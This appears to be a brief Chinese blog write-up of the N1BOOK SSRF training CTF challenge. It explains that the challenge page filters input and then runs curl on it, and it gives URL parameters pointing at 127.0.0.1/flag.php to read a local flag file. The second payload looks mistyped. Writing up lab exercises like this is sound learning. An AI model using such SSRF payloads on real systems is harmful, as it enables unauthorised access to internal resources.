8.31 N1BOOK SSRF Training

观察challenge.php可知我们要通过访问本地 来获取flag.php 文件
源码就是一堆过滤 + curl命令执行
直接构造

?url=http://127.0.0.1/flag.php

?url=http://localhost.flag.php

即可获得flag{}
image

posted @ 2023-08-31 11:46  N0zoM1z0  阅读(4)  评论(0编辑  收藏  举报